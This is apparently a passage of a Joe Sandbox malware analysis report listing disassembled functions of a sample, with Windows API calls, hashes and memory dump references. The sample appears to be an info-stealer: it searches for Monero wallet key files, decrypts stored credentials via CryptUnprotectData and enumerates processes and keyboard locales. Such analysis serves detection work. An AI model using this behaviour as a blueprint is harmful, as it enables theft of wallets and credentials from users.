                          • Opcode ID: cb70c4dc669b1592c97bc59da2cf3d21be929cac42756652d2c029a8d9f67ce4
                          • Instruction ID: 5670f4f5190b1fa7a48d5b19c578197d06b7c33ecf65bbc4d69117e48106e818
                          • Opcode Fuzzy Hash: cb70c4dc669b1592c97bc59da2cf3d21be929cac42756652d2c029a8d9f67ce4
                          • Instruction Fuzzy Hash: 0212E072911128ABDB19FB60EC96FEE7378AF94300F404599F50A62095EF306F89CF95
                          Function 0091DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00930C2E), ref: 0091DE5E
                          • StrCmpCA.SHLWAPI(?,009314C8), ref: 0091DEAE
                          • StrCmpCA.SHLWAPI(?,009314CC), ref: 0091DEC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0091E3E0
                          • FindClose.KERNEL32(000000FF), ref: 0091E3F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: 8e0b0c889ef4f646b6d353ded3c02b1bc380e3e98296a8c5d69d41fc817d0a93
                          • Instruction ID: ba4c98e8c997f210e7124965bd3c756d83015d5315908e333248bf131f716f8b
                          • Opcode Fuzzy Hash: 8e0b0c889ef4f646b6d353ded3c02b1bc380e3e98296a8c5d69d41fc817d0a93
                          • Instruction Fuzzy Hash: 44F18E729151289BDB15EB60EC95BEE7338BF98300F4045D9E41A62095EF306F8ACF65
                          Function 0091DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009314B0,00930C2A), ref: 0091DAEB
                          • StrCmpCA.SHLWAPI(?,009314B4), ref: 0091DB33
                          • StrCmpCA.SHLWAPI(?,009314B8), ref: 0091DB49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0091DDCC
                          • FindClose.KERNEL32(000000FF), ref: 0091DDDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: 4f3401cf64b624c2b6ab98b81b5fbd11350560e227890ac30b75f3183d07da2b
                          • Instruction ID: 57f5640c1af0da16150a8f3fc3a4edf0555256e8876c92bc0c2554332dbad02a
                          • Opcode Fuzzy Hash: 4f3401cf64b624c2b6ab98b81b5fbd11350560e227890ac30b75f3183d07da2b
                          • Instruction Fuzzy Hash: D6910573A00118ABCB14FB70FC56BED737DABC8300F408658F94A96195EE349B59CB96
                          Function 00CE29D8 Relevance: 11.7, Strings: 8, Instructions: 1693COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 4A+~$?\v_$Wg.$X7_U$pk{?$zCj:$qZf$^u
                          • API String ID: 0-903456993
                          • Opcode ID: 44b42ca738b520854632d733fb80238cbf3ecc9f5a3d9e15be55fd3205d637d9
                          • Instruction ID: 9ca43fd22a24a7b574e78568fd99cc065a9015a3dcec1a926b5346023027d2aa
                          • Opcode Fuzzy Hash: 44b42ca738b520854632d733fb80238cbf3ecc9f5a3d9e15be55fd3205d637d9
                          • Instruction Fuzzy Hash: 94B25AF3A0C2149FE3046E2DEC85B7ABBD9EF94720F1A463DEAC4C3744E93558058696
                          Function 00927B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          • GetKeyboardLayoutList.USER32(00000000,00000000,009305AF), ref: 00927BE1
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00927BF9
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00927C0D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00927C62
                          • LocalFree.KERNEL32(00000000), ref: 00927D22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: dd4844e7255edc67f33177a350fc9081edd563250bc65d218b1d2f5fdc3cf0e7
                          • Instruction ID: 398e2ec9b04ff176e42dcae4853fbadaf5df8f76693e2106687c63a0fc4e1e00
                          • Opcode Fuzzy Hash: dd4844e7255edc67f33177a350fc9081edd563250bc65d218b1d2f5fdc3cf0e7
                          • Instruction Fuzzy Hash: CB414171941228ABDB24DB94EC99BEDB778FF84700F2041D9E10972295DB342F85CFA1
                          Function 0091E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00930D73), ref: 0091E4A2
                          • StrCmpCA.SHLWAPI(?,009314F8), ref: 0091E4F2
                          • StrCmpCA.SHLWAPI(?,009314FC), ref: 0091E508
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0091EBDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: 6712bcd45cbf57bf96de893f6cb25ca555eca226c9313955ae2f2885d374cfc3
                          • Instruction ID: 734a2fe75a4d1c3eef98c18b9514a3cf1157f3f98e083bad8a16c702e8dd3441
                          • Opcode Fuzzy Hash: 6712bcd45cbf57bf96de893f6cb25ca555eca226c9313955ae2f2885d374cfc3
                          • Instruction Fuzzy Hash: EC1221739111289BDB18FB60EC96BED7379AFD4300F4045A8F50A66095EE306F89CF96
                          Function 00CDA476 Relevance: 7.9, Strings: 5, Instructions: 1666COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 2/|}$Uj'n$[x??$jN${%>
                          • API String ID: 0-3800172134
                          • Opcode ID: adda45f2d7e211389063918ab9998da79f8f78658fbdbc01ae52f9b338f79a09
                          • Instruction ID: 9219a7b68b726ad14bd3dc688c50cf470072f99ec3357afe9d1d286bcf95abf9
                          • Opcode Fuzzy Hash: adda45f2d7e211389063918ab9998da79f8f78658fbdbc01ae52f9b338f79a09
                          • Instruction Fuzzy Hash: C5B217F3A0C2149FE3046E2DEC8567ABBE9EFD4720F1A893DE6C4C7744E93558058692
                          Function 0091C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0091C871
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0091C87C
                          • lstrcat.KERNEL32(?,00930B46), ref: 0091C943
                          • lstrcat.KERNEL32(?,00930B47), ref: 0091C957
                          • lstrcat.KERNEL32(?,00930B4E), ref: 0091C978
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: a7adba6e54ab5bfeb70a63fc608e14bd034e49f8f9cd2c2ef1d2802f522892a5
                          • Instruction ID: 0d3a9dd0329f64a185c10cc5a4710af7098305714da30b7be5ee2569f219865c
                          • Opcode Fuzzy Hash: a7adba6e54ab5bfeb70a63fc608e14bd034e49f8f9cd2c2ef1d2802f522892a5
                          • Instruction Fuzzy Hash: 8B4150B590431EDFDB10DFA0DD89BEEB7B8AB48305F1046A8E509A7280DB745A84CF91
                          Function 00917240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0091724D
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00917254
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00917281
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 009172A4
                          • LocalFree.KERNEL32(?), ref: 009172AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: a6d86ff7ac61dc19d05a4b04a167a484cfb034d701dea96c7181bd86e9d784af
                          • Instruction ID: c43a6492e15a3e80da8b8ca15701730d179a3ec2890ea7e48b067b63fcb44b2a
                          • Opcode Fuzzy Hash: a6d86ff7ac61dc19d05a4b04a167a484cfb034d701dea96c7181bd86e9d784af
                          • Instruction Fuzzy Hash: 10010075B40308BBDB10DBD4CD45F9D77B8AB44701F104594FB15BB2C0DA70AA018B65
                          Function 00929600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0092961E
                          • Process32First.KERNEL32(00930ACA,00000128), ref: 00929632
                          • Process32Next.KERNEL32(00930ACA,00000128), ref: 00929647
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 0092965C
                          • CloseHandle.KERNEL32(00930ACA), ref: 0092967A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: 61912aa855ab2f452080db22146c88ab8c1f972442d5e261a777cc3ad2b54a95
                          • Instruction ID: 5a83d954aa12e78b864d5d479f8aa8f2f27aa0fe2de8ffab9d59ecc51205e9e3
                          • Opcode Fuzzy Hash: 61912aa855ab2f452080db22146c88ab8c1f972442d5e261a777cc3ad2b54a95
                          • Instruction Fuzzy Hash: 9B010C75A00318ABCB14DFA5DD58BEDBBF8FB48701F1042C8A909A7240DB349B44CF51
                          Function 00CDF96C Relevance: 7.4, Strings: 5, Instructions: 1153COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 2o<$4F\$>^'$gB={$s__
                          • API String ID: 0-1767298100
                          • Opcode ID: 56511569f446b05eb67512e9d9c271479ef0d185173caced42b7b8f550e77787
